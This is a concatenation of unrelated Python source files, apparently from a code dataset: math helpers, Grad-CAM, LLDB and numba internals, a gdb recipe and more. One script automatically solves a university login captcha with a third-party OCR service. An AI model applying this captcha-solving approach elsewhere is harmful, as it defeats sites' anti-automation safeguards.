    # Divisors come in pairs (i, n // i); a perfect-square root pairs with
    # itself and counts once.
    for i in range(1, int(math.sqrt(n)) + 1):
        if n % i:
            continue
        total += 1 if i * i == n else 2
    return total
def divisor_sum(n):
    """
    Calculates σ(n), the sum of all divisors of n

    Parameters
    ----------
    n : int
        positive integer whose divisor sum is calculated

    return : int
        the sum of the divisors of n
    """
    if(n<=0):
        raise ValueError(
            "n must be a positive integer"
        )
    total = 0
    # Add each divisor pair (i, n // i); a perfect-square root is added once.
    for i in range(1, int(math.sqrt(n)) + 1):
        if n % i == 0:
            total += i if i * i == n else i + n // i
    return total
def divisor_product(n):
    """
    Calculates the product of all divisors of positive integer n

    Parameters
    ----------
    n : int
        denotes positive integer

    return : int
        the exact product of all divisors of n

    Bug fix: the original computed ``int(n ** (d(n) / 2))`` in floating
    point, which loses precision (and returns wrong values) as soon as the
    product exceeds 2**53.  The product is now accumulated with exact
    integer arithmetic over the divisor pairs (i, n // i).
    """
    if(n<=0 or n!=int(n)):
        raise ValueError(
            "n must be positive integer"
        )
    product = 1
    for i in range(1, int(math.sqrt(n)) + 1):
        if n % i == 0:
            product *= i
            # A perfect-square root pairs with itself; multiply it once.
            if i * i != n:
                product *= n // i
    return product
98118 | import cv2
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
class GradCAM():
    """Grad-CAM: builds a class-activation heat map from the activations of
    *target_layer* and the gradient of the class score w.r.t. them."""

    def __init__(self, model, target_layer, use_cuda):
        self.model = model.eval()
        self.target_layer = target_layer
        self.use_cuda = use_cuda
        # Filled in by the forward/backward hooks registered below.
        self.feature_map = 0
        self.grad = 0
        if self.use_cuda:
            self.model = self.model.cuda()
        # Hook the named target layer to capture its output activations and
        # the gradient flowing back into them.
        for module in self.model.named_modules():
            if module[0] == target_layer:
                module[1].register_forward_hook(self.save_feature_map)
                module[1].register_backward_hook(self.save_grad)

    def save_feature_map(self, module, input, output):
        """Forward hook: stash the target layer's output activations."""
        self.feature_map = output.detach()

    def save_grad(self, module, grad_in, grad_out):
        """Backward hook: stash the gradient w.r.t. the layer output."""
        self.grad = grad_out[0].detach()

    def __call__(self, x, index=None):
        """Return (cam, class_index) for input *x*.

        If *index* is None, the model's top-scoring class is used.
        NOTE(review): the [0] indexing assumes batch size 1 — confirm.
        """
        x = x.clone()
        if self.use_cuda:
            x = x.cuda()
        output = self.model(x)
        if index == None:
            index = np.argmax(output.cpu().data.numpy())
        # One-hot select the class score, then backprop it to fill the hooks.
        one_hot = np.zeros((1, output.size()[-1]), dtype = np.float32)
        one_hot[0][index] = 1
        one_hot = torch.from_numpy(one_hot)
        one_hot.requires_grad_()
        if self.use_cuda:
            one_hot = torch.sum(one_hot.cuda() * output)
        else:
            one_hot = torch.sum(one_hot * output)
        self.model.zero_grad()
        one_hot.backward()
        self.feature_map = self.feature_map.cpu().numpy()[0]
        # Channel weights = spatially averaged gradients (Grad-CAM weights).
        self.weights = np.mean(self.grad.cpu().numpy(), axis = (2, 3))[0, :]
        cam = np.sum(self.feature_map * self.weights[:, None, None], axis=0)
        # ReLU the map and resize it to the input's spatial dimensions.
        cam = np.maximum(cam, 0)
        cam = cv2.resize(cam, (x.size()[-1], x.size()[-2]))
        return cam, index
def show_cam_on_image(img, mask):
    """Overlay a CAM heat-map on an image.

    Args:
        img: float image with values in [0, 1] — assumed HxWx3; confirm
            with the caller.
        mask: CAM values in [0, 1].

    Returns:
        uint8 image of the blended heat-map.
    """
    colored = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET)
    blended = np.float32(colored) / 255 + np.float32(img)
    blended = blended / np.max(blended)
    return np.uint8(255 * blended)
| StarcoderdataPython |
1773829 | from app import app as application
# Run manually with: $ flask run
if __name__ == "__main__":
    import os

    # Environment variables are strings and SERVER_PORT may be unset;
    # Flask/werkzeug expect an int port, so convert explicitly and fall
    # back to Flask's default port 5000.
    application.run(host='0.0.0.0', port=int(os.getenv('SERVER_PORT') or 5000))
| StarcoderdataPython |
1614743 | <gh_stars>1-10
import base64
import requests
import os
import time
import json
import os.path as osp
from bs4 import BeautifulSoup
from utils.logger import *
# Scratch location where the captcha image is written for OCR.
tmp_dir = osp.join(osp.dirname(__file__), '..', 'tmp')
tmp_img_path = osp.join(tmp_dir, 'tmp.jpg')
logger = Logger.get_logger()
# Load Baidu OCR credentials from etc/baidu_api.json.  A context manager
# closes the config file handle promptly (the previous bare open() leaked it).
with open(osp.join(osp.dirname(__file__), '..', 'etc', 'baidu_api.json')) as _key_file:
    baidu_api_keys = json.load(_key_file)
API_KEY = baidu_api_keys['API_KEY']  # API Key
SECRET_KEY = baidu_api_keys['SECRET_KEY']  # Secret Key
TOKEN_URL = 'https://aip.baidubce.com/oauth/2.0/token'  # token request URL
OCR_URL = 'https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic'  # general OCR endpoint
def baidu_text_api(img: bytes):
    """OCR the given captcha image bytes via Baidu's general OCR API.

    Parameters
    ----------
    img : bytes
        Raw image data to recognize.

    Returns
    -------
    str or None
        The first recognized text line, or None when recognition fails.
    """
    data = {
        'grant_type': 'client_credentials',
        'client_id': API_KEY,
        'client_secret': SECRET_KEY
    }
    r = requests.post(TOKEN_URL, data=data)
    if 'access_token' in r.json():
        access_token = r.json().get('access_token')
    else:
        logger.info('Please check your APP_ID, SECRET_KEY!')
        toast('Please check your APP_ID, SECRET_KEY!')
        exit(-1)
    print(access_token)
    # Use the bytes passed by the caller instead of re-reading (and leaking
    # an open handle to) the temporary file on disk — the caller writes the
    # same bytes to tmp_img_path before invoking us.
    params = {"image": base64.b64encode(img)}
    request_url = OCR_URL + "?access_token=" + access_token
    headers = {'content-type': 'application/x-www-form-urlencoded'}
    response = requests.post(request_url, data=params, headers=headers)
    try:
        print(response.json())
        verification_code = response.json()['words_result'][0]['words']
    except (ValueError, KeyError, IndexError):
        # Narrowed from a bare ``except:``; covers non-JSON bodies and
        # missing/empty result fields.
        verification_code = None
    print(f'recognized code: {verification_code}')
    return verification_code
def get_verification_code(session):
    """Fetch the USTC login captcha and OCR it, retrying up to three times.

    The captcha image is also written to ``tmp_img_path`` before
    recognition.  Returns the recognized code, which may be None when all
    attempts fail.
    """
    code = None
    for _attempt in range(3):
        url = f"https://passport.ustc.edu.cn/validatecode.jsp?type=login&x={int(time.time())}"
        img = session.get(url).content
        os.makedirs(tmp_dir, exist_ok=True)
        with open(tmp_img_path, 'wb') as f:
            f.write(img)
        code = baidu_text_api(img)
        if code:
            break
    return code
def login(session, username, password):
    """Log *session* into the USTC CAS passport portal.

    Fetches the login form to obtain the CAS_LT token, OCRs the captcha via
    :func:`get_verification_code`, posts the credentials, and returns the
    response page HTML (its content indicates whether login succeeded).
    """
    # login
    # 1. get `CAS_LT`
    response = session.get("https://passport.ustc.edu.cn/login?service=https%3A%2F%2Fweixine.ustc.edu.cn%2F2020%2Fcaslogin")
    response = BeautifulSoup(response.content, 'lxml')
    login_form = response.find_all(class_='loginForm form-style')[0]
    CAS_LT = login_form.find_next(id='CAS_LT')['value']
    # 2. get and crack the verification code
    verification_code = get_verification_code(session)
    # NOTE(review): 'showCode' appears twice in this literal; the later ''
    # silently wins over '1' — confirm which value the portal expects.
    data = {'username': username, 'password': password,
            'showCode': '1', 'LT': verification_code, 'CAS_LT': CAS_LT,
            'service': "https://weixine.ustc.edu.cn/2020/caslogin", 'model': "uplogin.jsp",
            'warn': '', 'showCode': '', 'button': ''}
    response = session.post("https://passport.ustc.edu.cn/login?service=https%3A%2F%2Fweixine.ustc.edu.cn%2F2020%2Fcaslogin", data=data)
    response_html = BeautifulSoup(response.content, 'lxml').__str__()
    print(f'登陆结果: {response}')
    return response_html
4825135 | <filename>Extras/011 - The Time in Words/TimeInWords.py<gh_stars>1-10
def timeInWords(h, m):
    """Render a clock time as English words.

    Given an hour ``h`` (1-12) and minute ``m`` (0-59), return e.g.
    ``timeInWords(12, 38)`` -> ``"twenty two minutes to one"``.
    """
    hour_names = ['one', 'two', 'three', 'four', 'five', 'six', 'seven',
                  'eight', 'nine', 'ten', 'eleven', 'twelve']
    minute_names = ['one', 'two', 'three', 'four', 'five', 'six', 'seven',
                    'eight', 'nine', 'ten', 'eleven', 'twelve', 'thirteen',
                    'fourteen', 'quarter', 'sixteen', 'seventeen',
                    'eighteen', 'nineteen', 'twenty', 'twenty one',
                    'twenty two', 'twenty three', 'twenty four',
                    'twenty five', 'twenty six', 'twenty seven',
                    'twenty eight', 'twenty nine', 'half']
    if m > 30:
        # Past the half hour: count minutes *to* the following hour.
        mins, hour, link = 60 - m, h + 1, 'to'
    else:
        mins, hour, link = m, h, 'past'
    if hour > 12:  # wrap twelve -> one
        hour = 1
    hour_word = hour_names[hour - 1]
    if mins == 0:
        return f"{hour_word} o' clock"
    minute_word = minute_names[mins - 1]
    if mins == 1:
        return f"{minute_word} minute {link} {hour_word}"
    if mins in (15, 30):
        # "quarter"/"half" read without the word "minutes".
        return f"{minute_word} {link} {hour_word}"
    return f"{minute_word} minutes {link} {hour_word}"
# Demo: prints "twenty two minutes to one".
print(timeInWords(12, 38))
82830 | <filename>app/toyApp/apps.py
from django.apps import AppConfig
class ToyappConfig(AppConfig):
    """Django application configuration for the ``toyApp`` app."""
    name = 'toyApp'
| StarcoderdataPython |
12956 | <filename>lldb/examples/summaries/cocoa/NSException.py
"""
LLDB AppKit formatters
part of The LLVM Compiler Infrastructure
This file is distributed under the University of Illinois Open Source
License. See LICENSE.TXT for details.
"""
# summary provider for class NSException
import lldb.runtime.objc.objc_runtime
import lldb.formatters.metrics
import CFString
import lldb
import lldb.formatters.Logger
# Shared metrics collector recording why summary generation succeeded or
# failed (consumed by GetSummary_Impl below).
statistics = lldb.formatters.metrics.Metrics()
statistics.add_metric('invalid_isa')
statistics.add_metric('invalid_pointer')
statistics.add_metric('unknown_class')
statistics.add_metric('code_notrun')
class NSKnownException_SummaryProvider:
    """Summary provider for values detected as genuine NSException.

    Reads the ``name`` and ``reason`` ivars directly from memory at
    pointer-size offsets, avoiding expression evaluation.
    """

    def adjust_for_architecture(self):
        pass

    def __init__(self, valobj, params):
        logger = lldb.formatters.Logger.Logger()
        self.valobj = valobj
        self.sys_params = params
        # Cache the generic ObjC id type once per session parameters.
        if not (self.sys_params.types_cache.id):
            self.sys_params.types_cache.id = self.valobj.GetType(
            ).GetBasicType(lldb.eBasicTypeObjCID)
        self.update()

    def update(self):
        logger = lldb.formatters.Logger.Logger()
        self.adjust_for_architecture()

    def offset_name(self):
        # One pointer into the object (presumably just past the isa word —
        # confirm against the NSException ivar layout).
        logger = lldb.formatters.Logger.Logger()
        return self.sys_params.pointer_size

    def offset_reason(self):
        # Two pointers into the object, directly after ``name``.
        logger = lldb.formatters.Logger.Logger()
        return 2 * self.sys_params.pointer_size

    def description(self):
        """Return 'name:<...> reason:<...>' built from the two ivars."""
        logger = lldb.formatters.Logger.Logger()
        name_ptr = self.valobj.CreateChildAtOffset(
            "name", self.offset_name(), self.sys_params.types_cache.id)
        reason_ptr = self.valobj.CreateChildAtOffset(
            "reason", self.offset_reason(), self.sys_params.types_cache.id)
        return 'name:' + CFString.CFString_SummaryProvider(
            name_ptr, None) + ' reason:' + CFString.CFString_SummaryProvider(reason_ptr, None)
class NSUnknownException_SummaryProvider:
    """Fallback summary provider for values not recognized as NSException.

    Evaluates ``[obj name]`` / ``[obj reason]`` expressions in the target,
    which is slower than the direct ivar reads of the known-class provider.
    """

    def adjust_for_architecture(self):
        pass

    def __init__(self, valobj, params):
        logger = lldb.formatters.Logger.Logger()
        self.valobj = valobj
        self.sys_params = params
        self.update()

    def update(self):
        logger = lldb.formatters.Logger.Logger()
        self.adjust_for_architecture()

    def description(self):
        """Return '<name> <reason>' via expression evaluation, or a
        placeholder when either expression fails."""
        logger = lldb.formatters.Logger.Logger()
        stream = lldb.SBStream()
        self.valobj.GetExpressionPath(stream)
        name_vo = self.valobj.CreateValueFromExpression(
            "name", "(NSString*)[" + stream.GetData() + " name]")
        reason_vo = self.valobj.CreateValueFromExpression(
            "reason", "(NSString*)[" + stream.GetData() + " reason]")
        if name_vo.IsValid() and reason_vo.IsValid():
            return CFString.CFString_SummaryProvider(
                name_vo, None) + ' ' + CFString.CFString_SummaryProvider(reason_vo, None)
        return '<variable is not NSException>'
def GetSummary_Impl(valobj):
    """Select a summary provider for *valobj*.

    Uses the ObjC runtime helpers to classify the value; real NSException
    objects get the fast ivar-reading provider, anything else falls back to
    expression evaluation.  Metrics are recorded either way.
    """
    logger = lldb.formatters.Logger.Logger()
    global statistics
    class_data, wrapper = lldb.runtime.objc.objc_runtime.Utilities.prepare_class_detection(
        valobj, statistics)
    if wrapper:
        # Class detection already produced a result (e.g. invalid pointer).
        return wrapper
    name_string = class_data.class_name()
    logger >> "class name is: " + str(name_string)
    if name_string == 'NSException':
        wrapper = NSKnownException_SummaryProvider(
            valobj, class_data.sys_params)
        statistics.metric_hit('code_notrun', valobj)
    else:
        wrapper = NSUnknownException_SummaryProvider(
            valobj, class_data.sys_params)
        statistics.metric_hit(
            'unknown_class',
            valobj.GetName() +
            " seen as " +
            name_string)
    return wrapper
def NSException_SummaryProvider(valobj, dict):
    """LLDB type-summary entry point for NSException values.

    Picks a provider via :func:`GetSummary_Impl` and returns its textual
    summary, falling back to placeholder strings when the value cannot be
    summarized.  (*dict* is the internal dictionary LLDB passes to all
    summary functions.)
    """
    logger = lldb.formatters.Logger.Logger()
    provider = GetSummary_Impl(valobj)
    if provider is not None:
        if isinstance(
                provider,
                lldb.runtime.objc.objc_runtime.SpecialSituation_Description):
            return provider.message()
        try:
            summary = provider.description()
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt and
            # SystemExit are no longer silently swallowed.
            summary = None
        logger >> "got summary " + str(summary)
        if summary is None:
            summary = '<variable is not NSException>'
        return str(summary)
    return 'Summary Unavailable'
def __lldb_init_module(debugger, dict):
    # Called by LLDB when this module is imported: register the summary
    # provider above for the NSException type.
    debugger.HandleCommand(
        "type summary add -F NSException.NSException_SummaryProvider NSException")
| StarcoderdataPython |
1692240 | <reponame>stangelandcl/hardhat
from .base import GnuRecipe
class GdbRecipe(GnuRecipe):
    """Build recipe for GDB 8.1.1.

    Configures the build against the system readline and zlib, and points
    GDB's auto-load directories into the install prefix so thread debugging
    can locate the pthread debug library (see the configure args below).
    """

    def __init__(self, *args, **kwargs):
        super(GdbRecipe, self).__init__(*args, **kwargs)
        self.sha256 = '97dcc3169bd430270fc29adb65145846' \
                      'a58c1b55cdbb73382a4a89307bdad03c'
        self.name = 'gdb'
        self.version = '8.1.1'
        self.url = 'http://ftp.gnu.org/gnu/gdb/gdb-$version.tar.xz'
        self.depends = ['readline', 'zlib']
        # Library search path inside the prefix; $p/$t are substituted with
        # the recipe's prefix directory and target triplet.
        autoload = '$p/$t/lib:$p/$t/lib64:$p/lib:$p/lib64'.replace(
            '$p', self.prefix_dir).replace('$t', self.target_triplet)
        self.configure_args += [
            '--with-system-readline',
            '--with-system-zlib',
            # Add path to load pthread db from for thread
            # debugging
            '--with-auto-load-dir=%s' % autoload,
            '--with-auto-load-safe-path=%s' % autoload
        ]
| StarcoderdataPython |
import edits
from edits import PageEditor

# Build a page editor for the "spider" keyword in block orientation and run it.
pe = PageEditor(keyword='spider', orientation='block')
pe.edit()
199199 | import traceback
from collections import namedtuple, defaultdict
import inspect
import itertools
import logging
import textwrap
from os import path
from shutil import get_terminal_size
from .abstract import Callable, DTypeSpec, Dummy, Literal, Type, weakref
from .common import Opaque
from .misc import unliteral
from numba.core import errors, utils, types, config
import numba
_logger = logging.getLogger(__name__)

# terminal color markup
_termcolor = errors.termcolor()

# One recorded resolution failure: the template that was tried, whether it
# matched, the error raised/message produced, and whether literal argument
# types were in use.
_FAILURE = namedtuple('_FAILURE', 'template matched error literal')

_termwidth = get_terminal_size().columns

# pull out the lead line as unit tests often use this
_header_lead = "No implementation of function"
_header_template = (_header_lead + " {the_function} found for signature:\n \n "
                    ">>> {fname}({signature})\n \nThere are {ncandidates} "
                    "candidate implementations:")

_reason_template = """
" - Of which {nmatches} did not match due to:\n
"""
def _wrapper(tmp, indent=0):
return textwrap.indent(tmp, ' ' * indent, lambda line: True)
# Per-failure-class explanation appended beneath the header for each group
# of identical errors.
_overload_template = ("- Of which {nduplicates} did not match due to:\n"
                      "{kind} {inof} function '{function}': File: {file}: "
                      "Line {line}.\n With argument(s): '({args})':")

# Maps failure-reason keys to their message templates.
_err_reasons = {}
_err_reasons['specific_error'] = ("Rejected as the implementation raised a "
                                  "specific error:\n{}")
def _bt_as_lines(bt):
"""
Converts a backtrace into a list of lines, squashes it a bit on the way.
"""
return [y for y in itertools.chain(*[x.split('\n') for x in bt]) if y]
def argsnkwargs_to_str(args, kwargs):
    """Format positional and keyword arguments as one comma-separated string,
    positional first, e.g. ``"1, a, x=2"``."""
    parts = [str(a) for a in args]
    parts.extend(f"{k}={v}" for k, v in kwargs.items())
    return ', '.join(parts)
class _ResolutionFailures(object):
    """Collect and format function resolution failures.
    """

    def __init__(self, context, function_type, args, kwargs, depth=0):
        self._context = context
        self._function_type = function_type
        self._args = args
        self._kwargs = kwargs
        # Maps a failure-message key to the list of _FAILUREs sharing it,
        # so identical errors are reported once with a count.
        self._failures = defaultdict(list)
        self._depth = depth
        self._max_depth = 5
        self._scale = 2

    def __len__(self):
        return len(self._failures)

    def add_error(self, calltemplate, matched, error, literal):
        """Record one failed template application.

        Args
        ----
        calltemplate : CallTemplate
        matched : bool
            Whether the template matched before failing.
        error : Exception or str
            Error message
        literal : bool
            Whether literal argument types were in use.
        """
        isexc = isinstance(error, Exception)
        errclazz = '%s: ' % type(error).__name__ if isexc else ''
        key = "{}{}".format(errclazz, str(error))
        self._failures[key].append(_FAILURE(calltemplate, matched, error,
                                            literal))

    def format(self):
        """Return a formatted error message from all the gathered errors.
        """
        indent = ' ' * self._scale
        argstr = argsnkwargs_to_str(self._args, self._kwargs)
        ncandidates = sum([len(x) for x in self._failures.values()])

        # sort out a display name for the function
        tykey = self._function_type.typing_key
        # most things have __name__
        fname = getattr(tykey, '__name__', None)
        is_external_fn_ptr = isinstance(self._function_type,
                                        ExternalFunctionPointer)

        if fname is None:
            if is_external_fn_ptr:
                fname = "ExternalFunctionPointer"
            else:
                fname = "<unknown function>"

        msgbuf = [_header_template.format(the_function=self._function_type,
                                          fname=fname,
                                          signature=argstr,
                                          ncandidates=ncandidates)]
        nolitargs = tuple([unliteral(a) for a in self._args])
        nolitkwargs = {k: unliteral(v) for k, v in self._kwargs.items()}
        nolitargstr = argsnkwargs_to_str(nolitargs, nolitkwargs)

        # depth could potentially get massive, so limit it.
        ldepth = min(max(self._depth, 0), self._max_depth)

        def template_info(tp):
            # Pull (name, file, lines, kind) out of a template, tolerating
            # missing keys.
            src_info = tp.get_template_info()
            unknown = "unknown"
            source_name = src_info.get('name', unknown)
            source_file = src_info.get('filename', unknown)
            source_lines = src_info.get('lines', unknown)
            source_kind = src_info.get('kind', 'Unknown template')
            return source_name, source_file, source_lines, source_kind

        for i, (k, err_list) in enumerate(self._failures.items()):
            err = err_list[0]
            nduplicates = len(err_list)
            template, error = err.template, err.error
            ifo = template_info(template)
            source_name, source_file, source_lines, source_kind = ifo
            largstr = argstr if err.literal else nolitargstr

            if err.error == "No match.":
                err_dict = defaultdict(set)
                for errs in err_list:
                    err_dict[errs.template].add(errs.literal)
                # if there's just one template, and it's erroring on
                # literal/nonliteral be specific
                if len(err_dict) == 1:
                    template = [_ for _ in err_dict.keys()][0]
                    source_name, source_file, source_lines, source_kind = \
                        template_info(template)
                    source_lines = source_lines[0]
                else:
                    source_file = "<numerous>"
                    source_lines = "N/A"

                msgbuf.append(_termcolor.errmsg(
                    _wrapper(_overload_template.format(nduplicates=nduplicates,
                                                       kind = source_kind.title(),
                                                       function=fname,
                                                       inof='of',
                                                       file=source_file,
                                                       line=source_lines,
                                                       args=largstr),
                             ldepth + 1)))
                msgbuf.append(_termcolor.highlight(_wrapper(err.error,
                                                            ldepth + 2)))
            else:
                # There was at least one match in this failure class, but it
                # failed for a specific reason try and report this.
                msgbuf.append(_termcolor.errmsg(
                    _wrapper(_overload_template.format(nduplicates=nduplicates,
                                                       kind = source_kind.title(),
                                                       function=source_name,
                                                       inof='in',
                                                       file=source_file,
                                                       line=source_lines[0],
                                                       args=largstr),
                             ldepth + 1)))

                if isinstance(error, BaseException):
                    reason = indent + self.format_error(error)
                    errstr = _err_reasons['specific_error'].format(reason)
                else:
                    errstr = error
                # if you are a developer, show the back traces
                if config.DEVELOPER_MODE:
                    if isinstance(error, BaseException):
                        # if the error is an actual exception instance, trace it
                        bt = traceback.format_exception(type(error), error,
                                                        error.__traceback__)
                    else:
                        bt = [""]
                    bt_as_lines = _bt_as_lines(bt)
                    nd2indent = '\n{}'.format(2 * indent)
                    errstr += _termcolor.reset(nd2indent +
                                               nd2indent.join(bt_as_lines))
                msgbuf.append(_termcolor.highlight(_wrapper(errstr,
                                                            ldepth + 2)))
            loc = self.get_loc(template, error)
            if loc:
                msgbuf.append('{}raised from {}'.format(indent, loc))

        # the commented bit rewraps each block, may not be helpful?!
        return _wrapper('\n'.join(msgbuf) + '\n')  # , self._scale * ldepth)

    def format_error(self, error):
        """Format error message or exception
        """
        if isinstance(error, Exception):
            return '{}: {}'.format(type(error).__name__, error)
        else:
            return '{}'.format(error)

    def get_loc(self, classtemplate, error):
        """Get source location information from the error message.

        Returns "file:line" for the innermost traceback frame, or None when
        *error* carries no traceback.
        """
        if isinstance(error, Exception) and hasattr(error, '__traceback__'):
            # traceback is unavailable in py2
            frame = traceback.extract_tb(error.__traceback__)[-1]
            return "{}:{}".format(frame[0], frame[1])

    def raise_error(self):
        # Re-raise any ForceLiteralArg untouched so the caller can retry
        # with literal types; otherwise raise the aggregated TypingError.
        for faillist in self._failures.values():
            for fail in faillist:
                if isinstance(fail.error, errors.ForceLiteralArg):
                    raise fail.error
        raise errors.TypingError(self.format())
class BaseFunction(Callable):
    """
    Base type class for some function types.

    Holds one or more typing templates sharing a single typing key; call
    resolution tries each template with literal and then non-literal
    argument types.
    """

    def __init__(self, template):
        if isinstance(template, (list, tuple)):
            self.templates = tuple(template)
            keys = set(temp.key for temp in self.templates)
            if len(keys) != 1:
                raise ValueError("incompatible templates: keys = %s"
                                 % (keys,))
            self.typing_key, = keys
        else:
            self.templates = (template,)
            self.typing_key = template.key
        # Populated during get_call_type: maps resolved arg tuples to the
        # template-provided implementation key.
        self._impl_keys = {}
        name = "%s(%s)" % (self.__class__.__name__, self.typing_key)
        self._depth = 0
        super(BaseFunction, self).__init__(name)

    @property
    def key(self):
        return self.typing_key, self.templates

    def augment(self, other):
        """
        Augment this function type with the other function types' templates,
        so as to support more input types.
        """
        if type(other) is type(self) and other.typing_key == self.typing_key:
            return type(self)(self.templates + other.templates)

    def get_impl_key(self, sig):
        """
        Get the implementation key (used by the target context) for the
        given signature.
        """
        return self._impl_keys[sig.args]

    def get_call_type(self, context, args, kws):
        """Resolve a call with the given argument types, returning the first
        signature any template accepts; raises TypingError (via the collected
        failures) when none matches."""
        failures = _ResolutionFailures(context, self, args, kws,
                                       depth=self._depth)
        self._depth += 1
        for temp_cls in self.templates:
            temp = temp_cls(context)
            # Try with literal argument types first, then with literals
            # stripped, recording every failure for the final report.
            for uselit in [True, False]:
                try:
                    if uselit:
                        sig = temp.apply(args, kws)
                    else:
                        nolitargs = tuple([unliteral(a) for a in args])
                        nolitkws = {k: unliteral(v) for k, v in kws.items()}
                        sig = temp.apply(nolitargs, nolitkws)
                except Exception as e:
                    sig = None
                    failures.add_error(temp, False, e, uselit)
                else:
                    if sig is not None:
                        self._impl_keys[sig.args] = temp.get_impl_key(sig)
                        self._depth -= 1
                        return sig
                    else:
                        registered_sigs = getattr(temp, 'cases', None)
                        if registered_sigs is not None:
                            msg = "No match for registered cases:\n%s"
                            msg = msg % '\n'.join(" * {}".format(x) for x in
                                                  registered_sigs)
                        else:
                            msg = 'No match.'
                        failures.add_error(temp, True, msg, uselit)

        if len(failures) == 0:
            raise AssertionError("Internal Error. "
                                 "Function resolution ended with no failures "
                                 "or successful signature")
        failures.raise_error()

    def get_call_signatures(self):
        # Concrete cases across all templates, plus whether any template is
        # parameterized (defines a generic()).
        sigs = []
        is_param = False
        for temp in self.templates:
            sigs += getattr(temp, 'cases', [])
            is_param = is_param or hasattr(temp, 'generic')
        return sigs, is_param
class Function(BaseFunction, Opaque):
    """
    Type class for builtin functions implemented by Numba.

    All call-resolution behaviour is inherited from BaseFunction; this
    subclass adds no members of its own.
    """
class BoundFunction(Callable, Opaque):
    """
    A function with an implicit first argument (denoted as *this* below).
    """

    def __init__(self, template, this):
        # Create a derived template with an attribute *this*
        newcls = type(template.__name__ + '.' + str(this), (template,),
                      dict(this=this))
        self.template = newcls
        self.typing_key = self.template.key
        self.this = this
        name = "%s(%s for %s)" % (self.__class__.__name__,
                                  self.typing_key, self.this)
        super(BoundFunction, self).__init__(name)

    def unify(self, typingctx, other):
        # Two bound functions unify when they share a typing key and their
        # *this* types unify; returns None (implicitly) otherwise.
        if (isinstance(other, BoundFunction) and
                self.typing_key == other.typing_key):
            this = typingctx.unify_pairs(self.this, other.this)
            if this is not None:
                # XXX is it right that both template instances are distinct?
                return self.copy(this=this)

    def copy(self, this):
        return type(self)(self.template, this)

    @property
    def key(self):
        return self.typing_key, self.this

    def get_impl_key(self, sig):
        """
        Get the implementation key (used by the target context) for the
        given signature.
        """
        return self.typing_key

    def get_call_type(self, context, args, kws):
        """Resolve a call: first with literal argument types, then with
        literals stripped; raises TypingError describing both failures when
        neither attempt succeeds."""
        template = self.template(context)
        literal_e = None
        nonliteral_e = None

        # Try with Literal
        try:
            out = template.apply(args, kws)
        except Exception as exc:
            if isinstance(exc, errors.ForceLiteralArg):
                raise exc
            literal_e = exc
            out = None

        # if the unliteral_args and unliteral_kws are the same as the literal
        # ones, set up to not bother retrying
        unliteral_args = tuple([unliteral(a) for a in args])
        unliteral_kws = {k: unliteral(v) for k, v in kws.items()}
        skip = unliteral_args == args and kws == unliteral_kws

        # If the above template application failed and the non-literal args are
        # different to the literal ones, try again with literals rewritten as
        # non-literals
        if not skip and out is None:
            try:
                out = template.apply(unliteral_args, unliteral_kws)
            except Exception as exc:
                if isinstance(exc, errors.ForceLiteralArg):
                    raise exc
                nonliteral_e = exc

        if out is None and (nonliteral_e is not None or literal_e is not None):
            header = "- Resolution failure for {} arguments:\n{}\n"
            tmplt = _termcolor.highlight(header)
            if config.DEVELOPER_MODE:
                indent = ' ' * 4

                def add_bt(error):
                    # Render the exception's traceback, indented for nesting.
                    if isinstance(error, BaseException):
                        # if the error is an actual exception instance, trace it
                        bt = traceback.format_exception(type(error), error,
                                                        error.__traceback__)
                    else:
                        bt = [""]
                    nd2indent = '\n{}'.format(2 * indent)
                    errstr = _termcolor.reset(nd2indent +
                                              nd2indent.join(_bt_as_lines(bt)))
                    return _termcolor.reset(errstr)
            else:
                add_bt = lambda X: ''

            def nested_msg(literalness, e):
                estr = str(e)
                estr = estr if estr else (str(repr(e)) + add_bt(e))
                new_e = errors.TypingError(textwrap.dedent(estr))
                return tmplt.format(literalness, str(new_e))
            raise errors.TypingError(nested_msg('literal', literal_e) +
                                     nested_msg('non-literal', nonliteral_e))
        return out

    def get_call_signatures(self):
        sigs = getattr(self.template, 'cases', [])
        is_param = hasattr(self.template, 'generic')
        return sigs, is_param
class MakeFunctionLiteral(Literal, Opaque):
    """Literal type wrapping a function object — presumably one produced by
    a MAKE_FUNCTION bytecode (per the class name); confirm against the
    interpreter/lowering code that constructs it."""
    pass
class WeakType(Type):
    """
    Base class for types parametered by a mortal object, to which only
    a weak reference is kept.
    """

    def _store_object(self, obj):
        # Keep only a weak reference so this type does not prolong the
        # underlying object's lifetime.
        self._wr = weakref.ref(obj)

    def _get_object(self):
        # Dereference the weakref, raising once the object has been
        # garbage-collected.
        obj = self._wr()
        if obj is None:
            raise ReferenceError("underlying object has vanished")
        return obj

    @property
    def key(self):
        return self._wr

    def __eq__(self, other):
        # Equal only when both weakrefs resolve to the same *live* object;
        # defers to the other operand for differing types.
        if type(self) is type(other):
            obj = self._wr()
            return obj is not None and obj is other._wr()
        return NotImplemented

    def __hash__(self):
        return Type.__hash__(self)
class Dispatcher(WeakType, Callable, Dummy):
    """
    Type class for @jit-compiled functions.

    Holds only a weak reference to the dispatcher object (see WeakType).
    """

    def __init__(self, dispatcher):
        self._store_object(dispatcher)
        super(Dispatcher, self).__init__("type(%s)" % dispatcher)

    def dump(self, tab=''):
        # Debug helper: print this type and the dispatcher's internals.
        # NOTE(review): ``self._code`` is not assigned anywhere in this
        # class — verify dump() actually works before relying on it.
        print(f'{tab}DUMP {type(self).__name__}[code={self._code}, name={self.name}]')
        self.dispatcher.dump(tab=tab + '  ')
        print(f'{tab}END DUMP')

    def get_call_type(self, context, args, kws):
        """
        Resolve a call to this dispatcher using the given argument types.
        A signature returned and it is ensured that a compiled specialization
        is available for it.
        """
        template, pysig, args, kws = self.dispatcher.get_call_template(args, kws)
        sig = template(context).apply(args, kws)
        if sig:
            sig = sig.replace(pysig=pysig)
        return sig

    def get_call_signatures(self):
        sigs = self.dispatcher.nopython_signatures
        return sigs, True

    @property
    def dispatcher(self):
        """
        A strong reference to the underlying numba.dispatcher.Dispatcher instance.
        """
        return self._get_object()

    def get_overload(self, sig):
        """
        Get the compiled overload for the given signature.
        """
        return self.dispatcher.get_overload(sig.args)

    def get_impl_key(self, sig):
        """
        Get the implementation key for the given signature.
        """
        return self.get_overload(sig)

    def unify(self, context, other):
        # Imprecise unification of function types is allowed here.
        return utils.unified_function_type((self, other), require_precise=False)
class ObjModeDispatcher(Dispatcher):
